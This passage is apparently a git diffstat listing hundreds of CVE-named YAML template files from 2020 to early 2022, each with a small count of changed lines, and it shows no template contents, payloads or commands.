http/cves/2020/CVE-2020-22211.yaml | 4 ++-- http/cves/2020/CVE-2020-22840.yaml | 2 +- http/cves/2020/CVE-2020-23015.yaml | 2 +- http/cves/2020/CVE-2020-23517.yaml | 2 +- http/cves/2020/CVE-2020-23575.yaml | 2 +- http/cves/2020/CVE-2020-23697.yaml | 2 +- http/cves/2020/CVE-2020-23972.yaml | 2 +- http/cves/2020/CVE-2020-24148.yaml | 2 +- http/cves/2020/CVE-2020-24223.yaml | 2 +- http/cves/2020/CVE-2020-24312.yaml | 2 +- http/cves/2020/CVE-2020-24391.yaml | 2 +- http/cves/2020/CVE-2020-24550.yaml | 2 +- http/cves/2020/CVE-2020-24571.yaml | 2 +- http/cves/2020/CVE-2020-24579.yaml | 2 +- http/cves/2020/CVE-2020-24589.yaml | 2 +- http/cves/2020/CVE-2020-24902.yaml | 2 +- http/cves/2020/CVE-2020-24903.yaml | 2 +- http/cves/2020/CVE-2020-24912.yaml | 2 +- http/cves/2020/CVE-2020-25078.yaml | 2 +- http/cves/2020/CVE-2020-25213.yaml | 2 +- http/cves/2020/CVE-2020-25495.yaml | 2 +- http/cves/2020/CVE-2020-25540.yaml | 2 +- http/cves/2020/CVE-2020-25780.yaml | 2 +- http/cves/2020/CVE-2020-25864.yaml | 2 +- http/cves/2020/CVE-2020-26153.yaml | 2 +- http/cves/2020/CVE-2020-26214.yaml | 2 +- http/cves/2020/CVE-2020-26248.yaml | 2 +- http/cves/2020/CVE-2020-26413.yaml | 2 +- http/cves/2020/CVE-2020-26876.yaml | 2 +- http/cves/2020/CVE-2020-26919.yaml | 2 +- http/cves/2020/CVE-2020-26948.yaml | 2 +- http/cves/2020/CVE-2020-27191.yaml | 2 +- http/cves/2020/CVE-2020-2733.yaml | 2 +- http/cves/2020/CVE-2020-27361.yaml | 2 +- http/cves/2020/CVE-2020-27467.yaml | 2 +- http/cves/2020/CVE-2020-27481.yaml | 2 +- http/cves/2020/CVE-2020-27735.yaml | 2 +- http/cves/2020/CVE-2020-27866.yaml | 2 +- http/cves/2020/CVE-2020-27982.yaml | 2 +- http/cves/2020/CVE-2020-27986.yaml | 2 +- http/cves/2020/CVE-2020-28185.yaml | 2 +- http/cves/2020/CVE-2020-28208.yaml | 2 +- http/cves/2020/CVE-2020-28351.yaml | 2 +- http/cves/2020/CVE-2020-28976.yaml | 2 +- http/cves/2020/CVE-2020-29164.yaml | 2 +- http/cves/2020/CVE-2020-29227.yaml | 2 +- http/cves/2020/CVE-2020-29284.yaml | 2 +- http/cves/2020/CVE-2020-29395.yaml | 2 +- http/cves/2020/CVE-2020-29453.yaml | 2 +- http/cves/2020/CVE-2020-29597.yaml | 2 +- http/cves/2020/CVE-2020-3452.yaml | 5 +++-- http/cves/2020/CVE-2020-35234.yaml | 2 +- http/cves/2020/CVE-2020-35338.yaml | 2 +- http/cves/2020/CVE-2020-35476.yaml | 2 +- http/cves/2020/CVE-2020-35489.yaml | 2 +- http/cves/2020/CVE-2020-35580.yaml | 2 +- http/cves/2020/CVE-2020-35598.yaml | 2 +- http/cves/2020/CVE-2020-35713.yaml | 2 +- http/cves/2020/CVE-2020-35729.yaml | 2 +- http/cves/2020/CVE-2020-35736.yaml | 2 +- http/cves/2020/CVE-2020-35749.yaml | 2 +- http/cves/2020/CVE-2020-35774.yaml | 2 +- http/cves/2020/CVE-2020-3580.yaml | 2 +- http/cves/2020/CVE-2020-35846.yaml | 2 +- http/cves/2020/CVE-2020-35847.yaml | 2 +- http/cves/2020/CVE-2020-35848.yaml | 2 +- http/cves/2020/CVE-2020-35951.yaml | 2 +- http/cves/2020/CVE-2020-35984.yaml | 2 +- http/cves/2020/CVE-2020-35985.yaml | 2 +- http/cves/2020/CVE-2020-35986.yaml | 2 +- http/cves/2020/CVE-2020-35987.yaml | 2 +- http/cves/2020/CVE-2020-36112.yaml | 2 +- http/cves/2020/CVE-2020-36289.yaml | 2 +- http/cves/2020/CVE-2020-36365.yaml | 2 +- http/cves/2020/CVE-2020-36510.yaml | 2 +- http/cves/2020/CVE-2020-4463.yaml | 2 +- http/cves/2020/CVE-2020-5191.yaml | 2 +- http/cves/2020/CVE-2020-5192.yaml | 2 +- http/cves/2020/CVE-2020-5284.yaml | 2 +- http/cves/2020/CVE-2020-5307.yaml | 2 +- http/cves/2020/CVE-2020-5405.yaml | 7 ++++--- http/cves/2020/CVE-2020-5410.yaml | 2 +- http/cves/2020/CVE-2020-5412.yaml | 2 +- http/cves/2020/CVE-2020-5775.yaml | 2 +- http/cves/2020/CVE-2020-5776.yaml | 2 +- http/cves/2020/CVE-2020-5777.yaml | 2 +- http/cves/2020/CVE-2020-6171.yaml | 2 +- http/cves/2020/CVE-2020-6308.yaml | 2 +- http/cves/2020/CVE-2020-6637.yaml | 2 +- http/cves/2020/CVE-2020-6950.yaml | 2 +- http/cves/2020/CVE-2020-7107.yaml | 2 +- http/cves/2020/CVE-2020-7136.yaml | 2 +- http/cves/2020/CVE-2020-7318.yaml | 2 +- http/cves/2020/CVE-2020-7796.yaml | 2 +- http/cves/2020/CVE-2020-7943.yaml | 2 +- http/cves/2020/CVE-2020-7961.yaml | 4 ++-- http/cves/2020/CVE-2020-8115.yaml | 2 +- http/cves/2020/CVE-2020-8191.yaml | 2 +- http/cves/2020/CVE-2020-8209.yaml | 2 +- http/cves/2020/CVE-2020-8497.yaml | 2 +- http/cves/2020/CVE-2020-8512.yaml | 2 +- http/cves/2020/CVE-2020-8515.yaml | 2 +- http/cves/2020/CVE-2020-8615.yaml | 2 +- http/cves/2020/CVE-2020-8641.yaml | 2 +- http/cves/2020/CVE-2020-8654.yaml | 2 +- http/cves/2020/CVE-2020-8771.yaml | 2 +- http/cves/2020/CVE-2020-8772.yaml | 2 +- http/cves/2020/CVE-2020-8813.yaml | 2 +- http/cves/2020/CVE-2020-8982.yaml | 2 +- http/cves/2020/CVE-2020-9036.yaml | 2 +- http/cves/2020/CVE-2020-9043.yaml | 2 +- http/cves/2020/CVE-2020-9047.yaml | 2 +- http/cves/2020/CVE-2020-9054.yaml | 2 +- http/cves/2020/CVE-2020-9344.yaml | 2 +- http/cves/2020/CVE-2020-9402.yaml | 2 +- http/cves/2020/CVE-2020-9425.yaml | 2 +- http/cves/2020/CVE-2020-9483.yaml | 2 +- http/cves/2020/CVE-2020-9757.yaml | 4 ++-- http/cves/2021/CVE-2021-1497.yaml | 4 ++-- http/cves/2021/CVE-2021-1498.yaml | 4 ++-- http/cves/2021/CVE-2021-1499.yaml | 2 +- http/cves/2021/CVE-2021-20031.yaml | 2 +- http/cves/2021/CVE-2021-20038.yaml | 2 +- http/cves/2021/CVE-2021-20091.yaml | 2 +- http/cves/2021/CVE-2021-20092.yaml | 2 +- http/cves/2021/CVE-2021-20114.yaml | 2 +- http/cves/2021/CVE-2021-20123.yaml | 2 +- http/cves/2021/CVE-2021-20124.yaml | 2 +- http/cves/2021/CVE-2021-20150.yaml | 2 +- http/cves/2021/CVE-2021-20158.yaml | 2 +- http/cves/2021/CVE-2021-20167.yaml | 2 +- http/cves/2021/CVE-2021-20323.yaml | 2 +- http/cves/2021/CVE-2021-20792.yaml | 2 +- http/cves/2021/CVE-2021-21087.yaml | 2 +- http/cves/2021/CVE-2021-21234.yaml | 2 +- http/cves/2021/CVE-2021-21311.yaml | 2 +- http/cves/2021/CVE-2021-21315.yaml | 4 ++-- http/cves/2021/CVE-2021-21345.yaml | 2 +- http/cves/2021/CVE-2021-21389.yaml | 2 +- http/cves/2021/CVE-2021-21402.yaml | 2 +- http/cves/2021/CVE-2021-21479.yaml | 2 +- http/cves/2021/CVE-2021-21745.yaml | 2 +- http/cves/2021/CVE-2021-21799.yaml | 2 +- http/cves/2021/CVE-2021-21800.yaml | 2 +- http/cves/2021/CVE-2021-21801.yaml | 2 +- http/cves/2021/CVE-2021-21802.yaml | 2 +- http/cves/2021/CVE-2021-21803.yaml | 2 +- http/cves/2021/CVE-2021-21816.yaml | 2 +- http/cves/2021/CVE-2021-21978.yaml | 2 +- http/cves/2021/CVE-2021-21985.yaml | 2 +- http/cves/2021/CVE-2021-22005.yaml | 2 +- http/cves/2021/CVE-2021-22053.yaml | 2 +- http/cves/2021/CVE-2021-22054.yaml | 2 +- http/cves/2021/CVE-2021-22122.yaml | 2 +- http/cves/2021/CVE-2021-22707.yaml | 2 +- http/cves/2021/CVE-2021-22873.yaml | 2 +- http/cves/2021/CVE-2021-22911.yaml | 2 +- http/cves/2021/CVE-2021-23241.yaml | 2 +- http/cves/2021/CVE-2021-24145.yaml | 2 +- http/cves/2021/CVE-2021-24146.yaml | 2 +- http/cves/2021/CVE-2021-24150.yaml | 2 +- http/cves/2021/CVE-2021-24155.yaml | 2 +- http/cves/2021/CVE-2021-24165.yaml | 2 +- http/cves/2021/CVE-2021-24169.yaml | 2 +- http/cves/2021/CVE-2021-24176.yaml | 2 +- http/cves/2021/CVE-2021-24210.yaml | 2 +- http/cves/2021/CVE-2021-24214.yaml | 2 +- http/cves/2021/CVE-2021-24215.yaml | 7 ++++--- http/cves/2021/CVE-2021-24226.yaml | 2 +- http/cves/2021/CVE-2021-24227.yaml | 2 +- http/cves/2021/CVE-2021-24235.yaml | 2 +- http/cves/2021/CVE-2021-24236.yaml | 2 +- http/cves/2021/CVE-2021-24237.yaml | 2 +- http/cves/2021/CVE-2021-24239.yaml | 2 +- http/cves/2021/CVE-2021-24245.yaml | 2 +- http/cves/2021/CVE-2021-24274.yaml | 2 +- http/cves/2021/CVE-2021-24275.yaml | 2 +- http/cves/2021/CVE-2021-24276.yaml | 2 +- http/cves/2021/CVE-2021-24278.yaml | 2 +- http/cves/2021/CVE-2021-24284.yaml | 2 +- http/cves/2021/CVE-2021-24285.yaml | 2 +- http/cves/2021/CVE-2021-24286.yaml | 2 +- http/cves/2021/CVE-2021-24287.yaml | 2 +- http/cves/2021/CVE-2021-24288.yaml | 2 +- http/cves/2021/CVE-2021-24291.yaml | 2 +- http/cves/2021/CVE-2021-24298.yaml | 2 +- http/cves/2021/CVE-2021-24300.yaml | 2 +- http/cves/2021/CVE-2021-24316.yaml | 2 +- http/cves/2021/CVE-2021-24320.yaml | 2 +- http/cves/2021/CVE-2021-24335.yaml | 2 +- http/cves/2021/CVE-2021-24340.yaml | 2 +- http/cves/2021/CVE-2021-24342.yaml | 2 +- http/cves/2021/CVE-2021-24351.yaml | 2 +- http/cves/2021/CVE-2021-24358.yaml | 2 +- http/cves/2021/CVE-2021-24364.yaml | 2 +- http/cves/2021/CVE-2021-24370.yaml | 4 ++-- http/cves/2021/CVE-2021-24387.yaml | 2 +- http/cves/2021/CVE-2021-24389.yaml | 2 +- http/cves/2021/CVE-2021-24406.yaml | 2 +- http/cves/2021/CVE-2021-24407.yaml | 2 +- http/cves/2021/CVE-2021-24409.yaml | 2 +- http/cves/2021/CVE-2021-24435.yaml | 2 +- http/cves/2021/CVE-2021-24436.yaml | 2 +- http/cves/2021/CVE-2021-24452.yaml | 2 +- http/cves/2021/CVE-2021-24472.yaml | 2 +- http/cves/2021/CVE-2021-24488.yaml | 2 +- http/cves/2021/CVE-2021-24495.yaml | 2 +- http/cves/2021/CVE-2021-24498.yaml | 2 +- http/cves/2021/CVE-2021-24499.yaml | 2 +- http/cves/2021/CVE-2021-24510.yaml | 2 +- http/cves/2021/CVE-2021-24554.yaml | 2 +- http/cves/2021/CVE-2021-24627.yaml | 2 +- http/cves/2021/CVE-2021-24647.yaml | 2 +- http/cves/2021/CVE-2021-24666.yaml | 2 +- http/cves/2021/CVE-2021-24731.yaml | 2 +- http/cves/2021/CVE-2021-24746.yaml | 2 +- http/cves/2021/CVE-2021-24750.yaml | 2 +- http/cves/2021/CVE-2021-24762.yaml | 2 +- http/cves/2021/CVE-2021-24791.yaml | 2 +- http/cves/2021/CVE-2021-24827.yaml | 2 +- http/cves/2021/CVE-2021-24838.yaml | 2 +- http/cves/2021/CVE-2021-24862.yaml | 2 +- http/cves/2021/CVE-2021-24875.yaml | 2 +- http/cves/2021/CVE-2021-24891.yaml | 2 +- http/cves/2021/CVE-2021-24910.yaml | 2 +- http/cves/2021/CVE-2021-24915.yaml | 2 +- http/cves/2021/CVE-2021-24917.yaml | 2 +- http/cves/2021/CVE-2021-24926.yaml | 2 +- http/cves/2021/CVE-2021-24931.yaml | 2 +- http/cves/2021/CVE-2021-24940.yaml | 2 +- http/cves/2021/CVE-2021-24946.yaml | 2 +- http/cves/2021/CVE-2021-24947.yaml | 4 ++-- http/cves/2021/CVE-2021-24956.yaml | 2 +- http/cves/2021/CVE-2021-24970.yaml | 2 +- http/cves/2021/CVE-2021-24979.yaml | 2 +- http/cves/2021/CVE-2021-24987.yaml | 4 ++-- http/cves/2021/CVE-2021-24991.yaml | 2 +- http/cves/2021/CVE-2021-24997.yaml | 2 +- http/cves/2021/CVE-2021-25003.yaml | 4 ++-- http/cves/2021/CVE-2021-25008.yaml | 2 +- http/cves/2021/CVE-2021-25016.yaml | 2 +- http/cves/2021/CVE-2021-25028.yaml | 2 +- http/cves/2021/CVE-2021-25033.yaml | 2 +- http/cves/2021/CVE-2021-25052.yaml | 2 +- http/cves/2021/CVE-2021-25055.yaml | 2 +- http/cves/2021/CVE-2021-25063.yaml | 2 +- http/cves/2021/CVE-2021-25065.yaml | 2 +- http/cves/2021/CVE-2021-25067.yaml | 2 +- http/cves/2021/CVE-2021-25074.yaml | 2 +- http/cves/2021/CVE-2021-25075.yaml | 2 +- http/cves/2021/CVE-2021-25078.yaml | 2 +- http/cves/2021/CVE-2021-25079.yaml | 2 +- http/cves/2021/CVE-2021-25085.yaml | 2 +- http/cves/2021/CVE-2021-25099.yaml | 2 +- http/cves/2021/CVE-2021-25104.yaml | 2 +- http/cves/2021/CVE-2021-25111.yaml | 2 +- http/cves/2021/CVE-2021-25112.yaml | 2 +- http/cves/2021/CVE-2021-25114.yaml | 2 +- http/cves/2021/CVE-2021-25118.yaml | 2 +- http/cves/2021/CVE-2021-25120.yaml | 2 +- http/cves/2021/CVE-2021-25281.yaml | 2 +- http/cves/2021/CVE-2021-25296.yaml | 2 +- http/cves/2021/CVE-2021-25297.yaml | 2 +- http/cves/2021/CVE-2021-25298.yaml | 2 +- http/cves/2021/CVE-2021-25299.yaml | 2 +- http/cves/2021/CVE-2021-25646.yaml | 2 +- http/cves/2021/CVE-2021-25899.yaml | 2 +- http/cves/2021/CVE-2021-26086.yaml | 2 +- http/cves/2021/CVE-2021-26247.yaml | 2 +- http/cves/2021/CVE-2021-26295.yaml | 2 +- http/cves/2021/CVE-2021-26475.yaml | 2 +- http/cves/2021/CVE-2021-26598.yaml | 2 +- http/cves/2021/CVE-2021-26702.yaml | 2 +- http/cves/2021/CVE-2021-26710.yaml | 2 +- http/cves/2021/CVE-2021-26723.yaml | 2 +- http/cves/2021/CVE-2021-26812.yaml | 2 +- http/cves/2021/CVE-2021-26855.yaml | 2 +- http/cves/2021/CVE-2021-27124.yaml | 2 +- http/cves/2021/CVE-2021-27132.yaml | 2 +- http/cves/2021/CVE-2021-27309.yaml | 2 +- http/cves/2021/CVE-2021-27310.yaml | 2 +- http/cves/2021/CVE-2021-27314.yaml | 2 +- http/cves/2021/CVE-2021-27315.yaml | 2 +- http/cves/2021/CVE-2021-27316.yaml | 2 +- http/cves/2021/CVE-2021-27319.yaml | 2 +- http/cves/2021/CVE-2021-27320.yaml | 2 +- http/cves/2021/CVE-2021-27330.yaml | 2 +- http/cves/2021/CVE-2021-27519.yaml | 2 +- http/cves/2021/CVE-2021-27520.yaml | 2 +- http/cves/2021/CVE-2021-27651.yaml | 2 +- http/cves/2021/CVE-2021-27670.yaml | 2 +- http/cves/2021/CVE-2021-27850.yaml | 5 +++-- http/cves/2021/CVE-2021-27909.yaml | 2 +- http/cves/2021/CVE-2021-27931.yaml | 2 +- http/cves/2021/CVE-2021-28149.yaml | 2 +- http/cves/2021/CVE-2021-28150.yaml | 2 +- http/cves/2021/CVE-2021-28151.yaml | 2 +- http/cves/2021/CVE-2021-28164.yaml | 2 +- http/cves/2021/CVE-2021-28169.yaml | 2 +- http/cves/2021/CVE-2021-28377.yaml | 2 +- http/cves/2021/CVE-2021-28419.yaml | 2 +- http/cves/2021/CVE-2021-28918.yaml | 2 +- http/cves/2021/CVE-2021-28937.yaml | 2 +- http/cves/2021/CVE-2021-29006.yaml | 2 +- http/cves/2021/CVE-2021-29156.yaml | 2 +- http/cves/2021/CVE-2021-29203.yaml | 2 +- http/cves/2021/CVE-2021-29441.yaml | 2 +- http/cves/2021/CVE-2021-29484.yaml | 2 +- http/cves/2021/CVE-2021-29490.yaml | 2 +- http/cves/2021/CVE-2021-29505.yaml | 2 +- http/cves/2021/CVE-2021-29622.yaml | 2 +- http/cves/2021/CVE-2021-29625.yaml | 2 +- http/cves/2021/CVE-2021-3002.yaml | 2 +- http/cves/2021/CVE-2021-30049.yaml | 2 +- http/cves/2021/CVE-2021-30128.yaml | 2 +- http/cves/2021/CVE-2021-30134.yaml | 2 +- http/cves/2021/CVE-2021-30151.yaml | 2 +- http/cves/2021/CVE-2021-3017.yaml | 2 +- http/cves/2021/CVE-2021-30175.yaml | 2 +- http/cves/2021/CVE-2021-3019.yaml | 2 +- http/cves/2021/CVE-2021-30213.yaml | 2 +- http/cves/2021/CVE-2021-3110.yaml | 2 +- http/cves/2021/CVE-2021-31249.yaml | 2 +- http/cves/2021/CVE-2021-31537.yaml | 2 +- http/cves/2021/CVE-2021-31581.yaml | 2 +- http/cves/2021/CVE-2021-31589.yaml | 2 +- http/cves/2021/CVE-2021-31602.yaml | 2 +- http/cves/2021/CVE-2021-31682.yaml | 2 +- http/cves/2021/CVE-2021-31805.yaml | 2 +- http/cves/2021/CVE-2021-31856.yaml | 2 +- http/cves/2021/CVE-2021-31862.yaml | 2 +- http/cves/2021/CVE-2021-32030.yaml | 2 +- http/cves/2021/CVE-2021-32172.yaml | 2 +- http/cves/2021/CVE-2021-3223.yaml | 2 +- http/cves/2021/CVE-2021-32305.yaml | 2 +- http/cves/2021/CVE-2021-32618.yaml | 2 +- http/cves/2021/CVE-2021-32789.yaml | 2 +- http/cves/2021/CVE-2021-32819.yaml | 2 +- http/cves/2021/CVE-2021-32820.yaml | 5 +++-- http/cves/2021/CVE-2021-32853.yaml | 2 +- http/cves/2021/CVE-2021-3293.yaml | 2 +- http/cves/2021/CVE-2021-3297.yaml | 2 +- http/cves/2021/CVE-2021-33044.yaml | 2 +- http/cves/2021/CVE-2021-33221.yaml | 2 +- http/cves/2021/CVE-2021-33564.yaml | 2 +- http/cves/2021/CVE-2021-3374.yaml | 2 +- http/cves/2021/CVE-2021-3377.yaml | 2 +- http/cves/2021/CVE-2021-3378.yaml | 2 +- http/cves/2021/CVE-2021-33807.yaml | 2 +- http/cves/2021/CVE-2021-33851.yaml | 2 +- http/cves/2021/CVE-2021-33904.yaml | 2 +- http/cves/2021/CVE-2021-34370.yaml | 2 +- http/cves/2021/CVE-2021-34473.yaml | 2 +- http/cves/2021/CVE-2021-34621.yaml | 2 +- http/cves/2021/CVE-2021-34640.yaml | 2 +- http/cves/2021/CVE-2021-34643.yaml | 2 +- http/cves/2021/CVE-2021-34805.yaml | 2 +- http/cves/2021/CVE-2021-35250.yaml | 2 +- http/cves/2021/CVE-2021-35265.yaml | 2 +- http/cves/2021/CVE-2021-35323.yaml | 2 +- http/cves/2021/CVE-2021-35336.yaml | 2 +- http/cves/2021/CVE-2021-35380.yaml | 2 +- http/cves/2021/CVE-2021-35464.yaml | 2 +- http/cves/2021/CVE-2021-35488.yaml | 2 +- http/cves/2021/CVE-2021-35587.yaml | 2 +- http/cves/2021/CVE-2021-3577.yaml | 7 ++++--- http/cves/2021/CVE-2021-36260.yaml | 2 +- http/cves/2021/CVE-2021-36356.yaml | 2 +- http/cves/2021/CVE-2021-36380.yaml | 2 +- http/cves/2021/CVE-2021-36450.yaml | 2 +- http/cves/2021/CVE-2021-3654.yaml | 2 +- http/cves/2021/CVE-2021-36580.yaml | 2 +- http/cves/2021/CVE-2021-36748.yaml | 2 +- http/cves/2021/CVE-2021-36749.yaml | 2 +- http/cves/2021/CVE-2021-36873.yaml | 2 +- http/cves/2021/CVE-2021-37216.yaml | 2 +- http/cves/2021/CVE-2021-37304.yaml | 2 +- http/cves/2021/CVE-2021-37305.yaml | 2 +- http/cves/2021/CVE-2021-37416.yaml | 2 +- http/cves/2021/CVE-2021-37538.yaml | 2 +- http/cves/2021/CVE-2021-37573.yaml | 2 +- http/cves/2021/CVE-2021-37580.yaml | 2 +- http/cves/2021/CVE-2021-37589.yaml | 2 +- http/cves/2021/CVE-2021-37704.yaml | 2 +- http/cves/2021/CVE-2021-37833.yaml | 2 +- http/cves/2021/CVE-2021-38314.yaml | 2 +- http/cves/2021/CVE-2021-38540.yaml | 2 +- http/cves/2021/CVE-2021-38702.yaml | 2 +- http/cves/2021/CVE-2021-38704.yaml | 2 +- http/cves/2021/CVE-2021-38751.yaml | 2 +- http/cves/2021/CVE-2021-39144.yaml | 3 ++- http/cves/2021/CVE-2021-39146.yaml | 2 +- http/cves/2021/CVE-2021-39152.yaml | 2 +- http/cves/2021/CVE-2021-39165.yaml | 2 +- http/cves/2021/CVE-2021-39211.yaml | 2 +- http/cves/2021/CVE-2021-39226.yaml | 2 +- http/cves/2021/CVE-2021-39312.yaml | 2 +- http/cves/2021/CVE-2021-39316.yaml | 2 +- http/cves/2021/CVE-2021-39320.yaml | 2 +- http/cves/2021/CVE-2021-39322.yaml | 2 +- http/cves/2021/CVE-2021-39327.yaml | 7 ++++--- http/cves/2021/CVE-2021-39350.yaml | 2 +- http/cves/2021/CVE-2021-39433.yaml | 2 +- http/cves/2021/CVE-2021-39501.yaml | 2 +- http/cves/2021/CVE-2021-40149.yaml | 2 +- http/cves/2021/CVE-2021-40150.yaml | 2 +- http/cves/2021/CVE-2021-40323.yaml | 2 +- http/cves/2021/CVE-2021-40539.yaml | 2 +- http/cves/2021/CVE-2021-40542.yaml | 2 +- http/cves/2021/CVE-2021-40661.yaml | 2 +- http/cves/2021/CVE-2021-40822.yaml | 2 +- http/cves/2021/CVE-2021-40856.yaml | 2 +- http/cves/2021/CVE-2021-40859.yaml | 2 +- http/cves/2021/CVE-2021-40868.yaml | 2 +- http/cves/2021/CVE-2021-40875.yaml | 2 +- http/cves/2021/CVE-2021-40908.yaml | 2 +- http/cves/2021/CVE-2021-40960.yaml | 2 +- http/cves/2021/CVE-2021-40968.yaml | 2 +- http/cves/2021/CVE-2021-40969.yaml | 2 +- http/cves/2021/CVE-2021-40970.yaml | 2 +- http/cves/2021/CVE-2021-40971.yaml | 2 +- http/cves/2021/CVE-2021-40972.yaml | 2 +- http/cves/2021/CVE-2021-40973.yaml | 2 +- http/cves/2021/CVE-2021-40978.yaml | 2 +- http/cves/2021/CVE-2021-41174.yaml | 2 +- http/cves/2021/CVE-2021-41192.yaml | 2 +- http/cves/2021/CVE-2021-41266.yaml | 2 +- http/cves/2021/CVE-2021-41277.yaml | 4 ++-- http/cves/2021/CVE-2021-41291.yaml | 2 +- http/cves/2021/CVE-2021-41293.yaml | 2 +- http/cves/2021/CVE-2021-41349.yaml | 2 +- http/cves/2021/CVE-2021-41381.yaml | 2 +- http/cves/2021/CVE-2021-41432.yaml | 2 +- http/cves/2021/CVE-2021-41460.yaml | 2 +- http/cves/2021/CVE-2021-41467.yaml | 2 +- http/cves/2021/CVE-2021-41569.yaml | 2 +- http/cves/2021/CVE-2021-41648.yaml | 2 +- http/cves/2021/CVE-2021-41649.yaml | 2 +- http/cves/2021/CVE-2021-41749.yaml | 2 +- http/cves/2021/CVE-2021-41773.yaml | 2 +- http/cves/2021/CVE-2021-41826.yaml | 2 +- http/cves/2021/CVE-2021-41878.yaml | 2 +- http/cves/2021/CVE-2021-41951.yaml | 2 +- http/cves/2021/CVE-2021-42013.yaml | 2 +- http/cves/2021/CVE-2021-42063.yaml | 2 +- http/cves/2021/CVE-2021-42192.yaml | 2 +- http/cves/2021/CVE-2021-42237.yaml | 4 ++-- http/cves/2021/CVE-2021-42551.yaml | 2 +- http/cves/2021/CVE-2021-42565.yaml | 2 +- http/cves/2021/CVE-2021-42566.yaml | 2 +- http/cves/2021/CVE-2021-42567.yaml | 2 +- http/cves/2021/CVE-2021-42627.yaml | 2 +- http/cves/2021/CVE-2021-42663.yaml | 2 +- http/cves/2021/CVE-2021-42667.yaml | 4 ++-- http/cves/2021/CVE-2021-42887.yaml | 2 +- http/cves/2021/CVE-2021-43062.yaml | 2 +- http/cves/2021/CVE-2021-43287.yaml | 2 +- http/cves/2021/CVE-2021-43421.yaml | 2 +- http/cves/2021/CVE-2021-43495.yaml | 2 +- http/cves/2021/CVE-2021-43496.yaml | 2 +- http/cves/2021/CVE-2021-43510.yaml | 2 +- http/cves/2021/CVE-2021-43574.yaml | 2 +- http/cves/2021/CVE-2021-43725.yaml | 2 +- http/cves/2021/CVE-2021-43734.yaml | 2 +- http/cves/2021/CVE-2021-43778.yaml | 2 +- http/cves/2021/CVE-2021-43810.yaml | 2 +- http/cves/2021/CVE-2021-44138.yaml | 2 +- http/cves/2021/CVE-2021-44139.yaml | 2 +- http/cves/2021/CVE-2021-44152.yaml | 2 +- http/cves/2021/CVE-2021-44228.yaml | 3 ++- http/cves/2021/CVE-2021-44427.yaml | 2 +- http/cves/2021/CVE-2021-44451.yaml | 2 +- http/cves/2021/CVE-2021-44528.yaml | 2 +- http/cves/2021/CVE-2021-44529.yaml | 2 +- http/cves/2021/CVE-2021-44848.yaml | 2 +- http/cves/2021/CVE-2021-45043.yaml | 2 +- http/cves/2021/CVE-2021-45046.yaml | 2 +- http/cves/2021/CVE-2021-45092.yaml | 2 +- http/cves/2021/CVE-2021-45380.yaml | 2 +- http/cves/2021/CVE-2021-45422.yaml | 2 +- http/cves/2021/CVE-2021-45428.yaml | 2 +- http/cves/2021/CVE-2021-45967.yaml | 2 +- http/cves/2021/CVE-2021-45968.yaml | 2 +- http/cves/2021/CVE-2021-46005.yaml | 2 +- http/cves/2021/CVE-2021-46068.yaml | 2 +- http/cves/2021/CVE-2021-46069.yaml | 2 +- http/cves/2021/CVE-2021-46071.yaml | 2 +- http/cves/2021/CVE-2021-46072.yaml | 2 +- http/cves/2021/CVE-2021-46073.yaml | 2 +- http/cves/2021/CVE-2021-46107.yaml | 2 +- http/cves/2021/CVE-2021-46379.yaml | 2 +- http/cves/2021/CVE-2021-46381.yaml | 2 +- http/cves/2021/CVE-2021-46387.yaml | 2 +- http/cves/2021/CVE-2021-46417.yaml | 2 +- http/cves/2021/CVE-2021-46422.yaml | 2 +- http/cves/2021/CVE-2021-46424.yaml | 2 +- http/cves/2021/CVE-2021-46704.yaml | 2 +- http/cves/2022/CVE-2022-0140.yaml | 2 +- http/cves/2022/CVE-2022-0147.yaml | 2 +- http/cves/2022/CVE-2022-0148.yaml | 2 +- http/cves/2022/CVE-2022-0149.yaml | 2 +- http/cves/2022/CVE-2022-0150.yaml | 2 +- http/cves/2022/CVE-2022-0165.yaml | 2 +- http/cves/2022/CVE-2022-0169.yaml | 2 +- http/cves/2022/CVE-2022-0189.yaml | 2 +- http/cves/2022/CVE-2022-0201.yaml | 2 +- http/cves/2022/CVE-2022-0206.yaml | 2 +- http/cves/2022/CVE-2022-0208.yaml | 2 +- http/cves/2022/CVE-2022-0212.yaml | 2 +- http/cves/2022/CVE-2022-0218.yaml | 2 +- http/cves/2022/CVE-2022-0220.yaml | 2 +- http/cves/2022/CVE-2022-0228.yaml | 2 +- http/cves/2022/CVE-2022-0234.yaml | 2 +- http/cves/2022/CVE-2022-0271.yaml | 4 ++-- http/cves/2022/CVE-2022-0281.yaml | 2 +- http/cves/2022/CVE-2022-0288.yaml | 2 +- http/cves/2022/CVE-2022-0342.yaml | 2 +- http/cves/2022/CVE-2022-0346.yaml | 2 +- http/cves/2022/CVE-2022-0349.yaml | 2 +- http/cves/2022/CVE-2022-0378.yaml | 2 +- http/cves/2022/CVE-2022-0381.yaml | 2 +- http/cves/2022/CVE-2022-0412.yaml | 2 +- http/cves/2022/CVE-2022-0415.yaml | 2 +- http/cves/2022/CVE-2022-0422.yaml | 2 +- http/cves/2022/CVE-2022-0432.yaml | 2 +- http/cves/2022/CVE-2022-0434.yaml | 2 +- http/cves/2022/CVE-2022-0437.yaml | 2 +- http/cves/2022/CVE-2022-0441.yaml | 2 +- http/cves/2022/CVE-2022-0482.yaml | 4 ++-- http/cves/2022/CVE-2022-0533.yaml | 2 +- http/cves/2022/CVE-2022-0535.yaml | 2 +- http/cves/2022/CVE-2022-0540.yaml | 2 +- http/cves/2022/CVE-2022-0591.yaml | 2 +- http/cves/2022/CVE-2022-0594.yaml | 2 +- http/cves/2022/CVE-2022-0595.yaml | 2 +- http/cves/2022/CVE-2022-0597.yaml | 2 +- http/cves/2022/CVE-2022-0599.yaml | 2 +- http/cves/2022/CVE-2022-0651.yaml | 2 +- http/cves/2022/CVE-2022-0653.yaml | 2 +- http/cves/2022/CVE-2022-0656.yaml | 2 +- http/cves/2022/CVE-2022-0658.yaml | 2 +- http/cves/2022/CVE-2022-0660.yaml | 2 +- http/cves/2022/CVE-2022-0678.yaml | 2 +- http/cves/2022/CVE-2022-0679.yaml | 2 +- http/cves/2022/CVE-2022-0692.yaml | 2 +- http/cves/2022/CVE-2022-0693.yaml | 2 +- http/cves/2022/CVE-2022-0735.yaml | 2 +- http/cves/2022/CVE-2022-0747.yaml | 2 +- http/cves/2022/CVE-2022-0760.yaml | 2 +- http/cves/2022/CVE-2022-0769.yaml | 2 +- http/cves/2022/CVE-2022-0773.yaml | 2 +- http/cves/2022/CVE-2022-0776.yaml | 2 +- http/cves/2022/CVE-2022-0781.yaml | 2 +- 